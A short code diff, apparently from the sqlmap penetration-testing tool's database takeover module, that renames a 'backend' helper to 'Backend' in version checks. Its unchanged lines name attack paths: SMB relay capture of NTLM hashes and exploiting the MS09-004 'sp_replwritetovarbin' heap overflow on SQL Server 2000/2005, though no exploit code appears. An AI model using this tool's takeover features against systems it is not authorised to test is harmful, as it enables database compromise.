- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
warnMsg += "because by default PostgreSQL on Windows runs "
warnMsg += "as postgres user which is a real user of the "
warnMsg += "system, but not within the Administrators group"
- elif backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
- warnMsg += "because often Microsoft SQL Server %s " % backend.getVersion()
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
+ warnMsg += "because often Microsoft SQL Server %s " % Backend.getVersion()
warnMsg += "runs as Network Service which is not a real user, "
warnMsg += "it does not send the NTLM session hash when "
warnMsg += "connecting to a SMB service"
@@ -300,14 +300,14 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
return
- if not backend.getIdentifiedDbms() == DBMS.MSSQL or not backend.isVersionWithin(("2000", "2005")):
+ if not Backend.getIdentifiedDbms() == DBMS.MSSQL or not Backend.isVersionWithin(("2000", "2005")):
errMsg = "the back-end DBMS must be Microsoft SQL Server "
errMsg += "2000 or 2005 to be able to exploit the heap-based "
errMsg += "buffer overflow in the 'sp_replwritetovarbin' "
errMsg += "stored procedure (MS09-004)"
raise sqlmapUnsupportedDBMSException(errMsg)
- infoMsg = "going to exploit the Microsoft SQL Server %s " % backend.getVersion()
+ infoMsg = "going to exploit the Microsoft SQL Server %s " % Backend.getVersion()
infoMsg += "'sp_replwritetovarbin' stored procedure heap-based "
infoMsg += "buffer overflow (MS09-004)"
logger.info(infoMsg)